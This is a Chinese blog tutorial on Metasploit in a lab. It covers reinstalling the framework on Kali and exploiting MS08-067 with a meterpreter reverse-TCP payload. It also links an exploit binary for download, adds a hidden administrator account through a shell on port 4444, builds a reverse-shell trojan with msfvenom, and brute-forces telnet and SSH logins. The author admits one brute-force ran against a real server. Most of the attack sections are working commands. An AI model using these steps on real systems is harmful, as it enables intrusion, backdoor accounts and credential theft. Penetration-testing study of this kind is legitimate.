渗透测试框架Metasploit功能众多,它可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。
一、安装metasploit
在kali系统使用metasploit时,启动发生故障,所以将其卸载重装
apt-get remove metasploit-framework
apt-get install metasploit-framework
重装失败,显示找不到需要的软件,更换source源后重新安装。
vim /etc/apt/sources.list
添加这两行
deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free
apt-get update
apt-get install metasploit-framework
安装成功。
启动:
成功启动
二、metasploit利用系统漏洞进行攻击
msfconsole
>show
>use exploit/windows/smb/ms08_067_netapi
>show options
>set RHOST 192.168.252.131 //RHOST是目标地址
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST 192.168.252.136
>exploit //或run,用来执行,本例执行肯定不成功,因为ms08_067是windows漏洞,我131上装的是centos。只是用来演示一下过程
image.png
image.png
image.png
image.png
image.png
ps:windows MS08067漏洞介绍
MS08067远程溢出漏洞是由于windows系统中RPC存在缺陷造成的,windows系统的server服务在处理特别RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。
1.工具——MS08067.exe 攻击命令MS08067.exe 192.168.1.3,向远程主机发送一串特殊构造的数据包,使目标主机产生内存溢出,程序跳转到shellcode代码处执行,shellcode代码在目标主机上开启4444端口,等待连接;
工具下载:https://pan.baidu.com/s/1WD6GOT_gTBm6Ahyk45jmRg
提取码:6cfu
也可以使用像上面一样使用metasploit进行攻击测试。
2.连接远程主机并添加用户 telnet 192.168.1.3 4444
成功连接目标主机,输入命令ipconfig
添加用户 net user aaa 123456 /add
把用户aaa添加到管理员组 net localgroup administrators aaa /add
确认aaa是否在管理员组 net user aaa
3.用户aaa远程连接目标主机 开始——运行——mstsc ,输入ip、账号、密码
三、使用metasploit自己制作木马,并利用起来
1.根据自己的ip生成一个木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.252.136 lPORT=55555 X >test.ext
2.将制作好的test.exe文件发送到靶机上(需要windows xp或03系统)
3.使用
use exploit/multi/handler //使用handle模块
set PAYLOAD windows/meterpreter/reverse_tcp //使用这个shellcode
set LHOST 192.168.252.136
set LPORT 55555
exploit //打开后,在靶机上双击test.exe,监测
四、使用metasploit扫描弱口令
use auxiliary/scanner/telnet/telnet_login //使用telnet爆破模块
set user_file user.txt //设置用户名字典
set pass_file user.txt //设置密码字典
set rhosts IP //我这里用的是真实的服务器地址,所以马掉了
run
尝试爆破telnet弱口令
1543310508(1).jpg
五、使用metasploit爆破ssh弱口令
本机ip:192.168.252.136
靶机ip:192.168.252.128
事先编辑好账号字典user.txt和密码字典password.txt
故意在靶机上设置弱口令root:ll123456和dazhutizi:123.
尝试爆破
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set user_file user.txt
user_file => user.txt
msf auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_login) > run
爆出root账号
但是普通用户dazhutizi的密码却没有爆出来,仔细查看结果,发现原来我之前在128上做了设置,使远程登录输错三次密码后将用户进行锁定==
image.png
按照我编辑的账号和密码本,root刚好尝试了三次就登录成功了,而其他普通用户都被锁定了==(锁定方法:https://www.jianshu.com/p/8c69cc00bbff)
普通用户被锁定
将其解锁,再尝试成功
参考:http://www.freebuf.com/sectool/67685.html
metasploit使用命令参考:https://www.cnblogs.com/lsgxeva/p/8450277.html
网友评论